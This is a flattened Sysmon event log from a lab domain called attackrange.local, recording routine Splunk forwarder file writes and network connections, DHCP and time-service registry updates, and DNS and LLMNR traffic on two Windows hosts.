07:56:13.476{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A7C91A24776EB2C9E4482DA5CEF715C,SHA256=A2D28457EC098A7951F51B53E04E620CAEF0831C6CECD89A36FC3AF5B3410192,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082372Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:10.728{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50093-false10.0.1.12-8000- 23542300x8000000000000000104505Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:14.476{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA428DABD4E476643EE75AB5542D05B,SHA256=6EBE3763E2161A6FA6691A5BAC26706A93CDF9FDD215E8441CE5BD396FC9F8C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082374Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:14.580{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9056563FA8B1B77ED5D3255870B7B449,SHA256=F5CA93EC3A94083D755ED915D41A5E4057DE92245AEA0A46DA892301922BF0C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082375Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:15.596{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E42697E9F0220A4C5A9647CB8018D37A,SHA256=26FFA2F40145911A0565BACD3DCB874FB2299A7004CCF5B98C49A2DB2E386DA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104506Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:15.476{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD5F643CB816F728DF2DD5CE05DD0C6B,SHA256=0EE4D84EDE0D7E965CEA2F81A8F59CB623716A3765B2CEE2A02AEAE5A429AA68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082376Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:16.600{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB69D0F13A250D03BBBE9B3E6E7AB19,SHA256=3FD967D1FC74DBD232E5AED7C7D4B8EB3DEAC7C72369F79C20F95C58638F3262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104507Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:16.488{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AB218DE911AEF8D152344AC8828A47,SHA256=3DB41C1DA3C44DB695362ED9FE09EB1E1C05A2A6D0D321591B35E9B28C7B1D79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082377Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:17.631{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA2C9E91E6B1DD7134C8F6D117765CE,SHA256=618CBCA58C72C068CB31DF2897E685DCA2E0DC78BE8BF4BA59185A4CBA152565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104508Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:17.488{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDCAA43736D81D6CD8698658078A74C,SHA256=A3172DD0961E80F803DFE993808B57898B61E1639D06E658BA7B987ABFB57FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082403Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:18.788{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=577077961387F38CE5843BAED139274D,SHA256=DE1F40D2B5DCFA5EDDCD574B2165C1AB3EFD69E9D3C941302D98C8AF65A06FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104510Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:18.707{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9390157ED60D7E942A1BCF2E1E3EE2ED,SHA256=F24E6477B4C757A8FFB7FEB530A3EDC8C955F7DFD9B3E33B6C4B2A3349DA9E96,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000082402Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000082401Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000082400Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000082399Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\FlagsDWORD (0x00000002) 13241300x800000000000000082398Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\TtlDWORD (0x000004b0) 13241300x800000000000000082397Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\SentPriUpdateToIpBinary Data 13241300x800000000000000082396Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\SentUpdateToIpBinary Data 13241300x800000000000000082395Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\DnsServersBinary Data 13241300x800000000000000082394Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\HostAddrsBinary Data 13241300x800000000000000082393Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\PrimaryDomainNameattackrange.local 13241300x800000000000000082392Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\AdapterDomainName(Empty) 13241300x800000000000000082391Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\Hostnamewin-host-36 13241300x800000000000000082390Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{4E748CBC-D679-4424-A61E-3BDC6EB39445}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000082389Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x800000000000000082388Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000082387Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\AddressTypeDWORD (0x00000000) 13241300x800000000000000082386Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\LeaseTerminatesTimeDWORD (0x615ac1b2) 13241300x800000000000000082385Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\T2DWORD (0x615abff0) 13241300x800000000000000082384Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\T1DWORD (0x615abaaa) 13241300x800000000000000082383Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\LeaseObtainedTimeDWORD (0x615ab3a2) 13241300x800000000000000082382Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\LeaseDWORD (0x00000e10) 13241300x800000000000000082381Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\DhcpServer10.0.1.1 13241300x800000000000000082380Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\DhcpSubnetMask255.255.255.0 13241300x800000000000000082379Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\DhcpIPAddress10.0.1.15 13241300x800000000000000082378Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:18.725{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4e748cbc-d679-4424-a61e-3bdc6eb39445}\DhcpInterfaceOptionsBinary Data 354300x8000000000000000104509Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:16.327{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49606-false10.0.1.12-8000- 23542300x8000000000000000104511Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:19.707{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBFDBD79CC8583BCEBC1B202BC88E9B,SHA256=510D61248BACB46E5CB2C1B37DD78332743542001FD135F52EFAD714AF8ED772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082406Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:19.803{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1718DD5E1F27F647B04FB165812EF40,SHA256=1BD13231DFFE1865C665E718CD96C3460CF97C869E92D3E44834297D32DBE264,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082405Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:16.606{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50094-false10.0.1.12-8000- 23542300x800000000000000082404Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:19.006{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=EE8D583CCEB9D6180623A249F7542DD9,SHA256=642CD36D52C5DFB667D91EB773BE669C597D2F098946CA5C8BDF9C160E0E3AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082418Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:20.803{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22CC73E4C4547A7E77496C6CC24DA1FC,SHA256=E6D8315D07D96E58F97BC48DE54F4DAC25B5E8D239F73C80B63BFB497EEBC613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104514Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:20.706{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E0E4C8063C0084DFC715B364207CA6E,SHA256=A4B151AFC0483242491C3B6750E33DC2B4E7A55F4624800F1ABB25D9FA738159,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104513Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:18.960{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.15-62757- 354300x8000000000000000104512Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:18.959{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.15-58499- 354300x800000000000000082417Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:18.278{2FDD8D40-AC9A-615A-1200-00000000FD01}996C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-36.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 13241300x800000000000000082416Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000082415Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001c1e9b) 13241300x800000000000000082414Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ec-0xef755710) 13241300x800000000000000082413Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f5-0x5139bf10) 13241300x800000000000000082412Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0xb2fe2710) 13241300x800000000000000082411Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000082410Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001c1e9b) 13241300x800000000000000082409Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ec-0xef755710) 13241300x800000000000000082408Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f5-0x5139bf10) 13241300x800000000000000082407Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:20.569{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0xb2fe2710) 23542300x800000000000000082421Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:21.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7E203E780637F88DE5951CC3D19D8EA,SHA256=9EE6800EA0426F5BB5814BDF137CCF8854134FE49487B34280A40DB692AE99CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104515Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:21.706{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7202A6BDD79BFEAF7EE752A93B8127E1,SHA256=9278F60D9A06E0CF894E3E976604A7195995BE5C8D9D14607055ADC1C67437D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082420Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:18.289{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:9800:fa77:8ee3:ffff-61616-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x800000000000000082419Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:18.289{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:9ec:a53:cffd:6279win-host-36.attackrange.local61616-trueff02:0:0:0:0:0:1:3-5355llmnr 23542300x800000000000000082422Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:22.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80481291ACDE3E6306A6C37FC11F6064,SHA256=131D9936A9594E8A97D00182F02A4378D9D31D7E00EA0131E4B3F6C4017372E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104517Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:22.706{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E22AB7A0DC68990A5F53DE8DED44A65B,SHA256=C2C15B8CF59A8A5EABE017678F9CBB5DF9589146B80C309ED6A01E0234C5F692,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104516Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:20.745{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.15-49425- 23542300x8000000000000000104519Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:23.706{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=209C54ED18497DA4620B7D9E8B459C68,SHA256=C1606E7DF27C314379029570EB0F43F63A2FF4A5EEAAF12FEBC3A811881CF117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082424Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:23.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED0B77B8111331FBDA021DF468656DB,SHA256=6798D7C483DD2C3D3F979D3F6C7551AB2C932863668C38D054F7C24C9A973045,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082423Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:21.717{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 